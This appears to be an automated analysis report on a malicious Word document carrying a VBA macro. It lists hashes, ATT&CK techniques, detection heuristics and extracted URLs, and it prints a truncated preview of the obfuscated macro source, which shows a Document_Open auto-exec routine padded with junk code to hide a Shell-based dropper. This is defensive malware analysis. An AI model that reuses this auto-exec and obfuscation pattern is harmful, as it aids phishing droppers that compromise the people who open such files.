Office (OOXML) malware analysis — malicious · c4cd5a98da798eb5

MALICIOUS

Office (OOXML)

132.1 KB Created: 2018-09-28 13:56:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-05-16

MD5: 614c1eff9e6d4e2983cc56bb663f16ad SHA-1: 614d035490e7df3f34fe72ddbc78a821bce18d2c SHA-256: c4cd5a98da798eb52a14a0f4e02e4eeeeda4791a3e917d8376608cb6aef70381

184 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA project with a Document_Open macro that calls the Shell function, indicating an attempt to execute arbitrary code. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or download URL. However, the presence of a Document_Open macro and Shell() call strongly suggests a downloader or dropper functionality, commonly associated with spearphishing attachments.

Heuristics 7

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.day.com/dam/1.0 In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/tiff/1.0/In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	62225 bytes
SHA-256: `8d7c1f20da760847e6de8e42edd8d9c2b8a15acebd437bc53e310c3d8c33139a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Set frm = New frmMain Call Hitler(frm.txtBox.Text) End Sub Attribute VB_Name = "p9W0F" Sub Hitler(JdGTZPYa) If 21 < 174 Then ' aT95o Else ' FlfwNeA9g Debug.Print "tqP7rIl" End If If 11628 / 19 = 2565 - 2557 Then JzMdsl = "THWAxFJIe" End If EnFPjg9Lh = 11000 EF8yiW = JzMdsl & EnFPjg9Lh Dim AB043Z AB043Z = 200 While AB043Z < 736 AB043Z = AB043Z + 23 Wend BHBN4Ag8F = "XNgWB5Y" aVPci = COSehLg & AB043Z If 355 - 189 = -324 + 338 Then bRsZ2 = "hGt8by" End If NgiWozK = 60928 pN8aF4Ix = bRsZ2 & NgiWozK If 355 - 189 = -324 + 338 Then Ff3wyd = "vEba6gdS" End If NUmdD8Z = 60928 h6unVyRg = Ff3wyd & NUmdD8Z If 670 - 32 = -2422 + 2427 Then ZAGDxsB = "RkeD5xHc6" End If YLmnN = 29595 lnMexzB = ZAGDxsB & YLmnN If 670 - 32 = -2422 + 2427 Then RvuQi = "AbtPV" End If VlVWwJonz = "Zvu7dqEM" V239N07 = RvuQi & VlVWwJonz If 670 - 32 = -2422 + 2427 Then A6wQyCG = "CchtgV" End If NbKcB = "Zalp0S" TeM9ZyA = A6wQyCG & NbKcB If 14 < 213 Then ' BZnV2G Else ' UqY6XogVU MsgBox "LDJfNl7U5" End If If 14 < 213 Then ' SDYVJvT Else ' ReuULoY MsgBox "Swe94" End If Dim Cfc5J1 Cfc5J1 = 206 While Cfc5J1 <= 689 Cfc5J1 = Cfc5J1 + 54 Wend lxEYz = 33837 TJIqZU9 = HLd5RTn & Cfc5J1 Dim O851bLj O851bLj = 129 While O851bLj <= 883 O851bLj = O851bLj + 60 Wend khn0btcqG = "xjZrLxGz" KC01JPi = MRzVe4 & O851bLj If 940 - 17 = 14448 / 903 Then nKFtj = "TXm0Hke8" End If wvQjhU = 18975 WMqvxLgZD = nKFtj & wvQjhU Dim RblVBe RblVBe = 129 While RblVBe < 883 RblVBe = RblVBe + 60 Wend jgiBc = 18975 Y8YNrG9 = QFrlxTiC & RblVBe If 675 + 32 = 5509 / 787 Then HAUsP = "tYrBSahx1" End If vPX5LDB = 29695 OHUVvp = HAUsP & vPX5LDB If 675 + 32 = 5509 / 787 Then bszF2dC = "KtRahY" End If efAiRIs0 = "gOi0Pk" tVGpAQ = bszF2dC & efAiRIs0 Dim uUvOmr uUvOmr = 20 While uUvOmr <= 973 uUvOmr = uUvOmr + 3 Wend pTclILw8b = "VCIDh14AU" MNrOE = zJG40Iu & uUvOmr If 6171 / 51 = 983 - 969 Then WG7CzXeg = "QvrWIz" End If xJXxRz = 29707 DyMoa = WG7CzXeg & xJXxRz Dim E2guJWBcs E2guJWBcs = 20 While E2guJWBcs < 973 E2guJWBcs = E2guJWBcs + 3 Wend vxeUpJTFG = 29707 PAJlpYWx = e6ecD & E2guJWBcs Dim xktDG xktDG = 155 While xktDG <= 731 xktDG = xktDG + 42 Wend PGnyW = "onk2VeXWA" zZHkxB = JVdOHtog & xktDG If 617 + 23 = 1266 - 1254 Then D9qdSw = "OrRGb5Q" End If kOVtF4h = 17715 PiFCf7MQZ = D9qdSw & kOVtF4h If 617 + 23 = 1266 - 1254 Then a9FqHW = "EtvVsE1oU" End If AYpvT8i = "MkxeHVBv" r95wUvS = a9FqHW & AYpvT8i Dim ISzB0ri2 ISzB0ri2 = 173 While ISzB0ri2 < 868 ISzB0ri2 = ISzB0ri2 + 21 Wend pXuaOYCl6 = 58252 qadQEp = ydhvXUtr & ISzB0ri2 If 512 - 39 = 1680 - 1671 Then PNopju = "FbzBwH7K" End If K53N1Xn = 58252 z7TbW = PNopju & K53N1Xn If 12 < 156 Then ' vKJR6 Else ' Cpvsj Debug.Print "RC3uBT" End If If 12 < 156 Then ' YvSNu4H Else ' mNdx0aHgG MsgBox "sN6Do" End If If 979 + 23 = 8540 / 854 Then KJy15hdqN = "qDM7PLgFl" End If T8P1grY = "mFA71M" VhLoRQkm1 = KJy15hdqN & T8P1grY If 46 < 184 Then ' FxFRzJs6 Else ' fZybriGg Debug.Print "ZvtfnaF" End If If 884 + 15 = 2709 - 2697 Then rlLIix3h = "ZfYwD" End If n6QV8J = 32466 JuhIEL9 = rlLIix3h & n6QV8J If 884 + 15 = 2709 - 2697 Then uHtvCz0Z = "Q2PhgWpHz" End If OrsCPA2Z = 32466 RZQelRw = uHtvCz0Z & OrsCPA2Z If 884 + 15 = 2709 - 2697 Then w3SMKVq = "J6oQH" End If IQjrI = 32466 Z9BItw51 = w3SMKVq & IQjrI If 351 + 55 = 2111 - 2096 Then U201u = "mAnTl" End If Zw7jLg = "qSEb6oWyV" xcwGo = U201u & Zw7jLg If 32 < 190 Then ' GAZYNBSU Else ' TXvh6WJL5 MsgBox "GXHBibGw" End If If 32 < 190 Then ' KLrBNtZ8i Else ' pbphf7 MsgBox "SKF5ZOD" End If If 351 + 55 = 2111 - 2096 Then MaHCzj91u = "K9gI6y" End If ILFou = "bOp2qi" A3qxw = MaHCzj91u & ILFou If 274 - 149 = 14476 / 1316 Then UiWAX = "g ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	174080 bytes
SHA-256: `aa619ed22d7f962848499075e8388cd214e865b946db5e03ccd6f32cbf707801`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.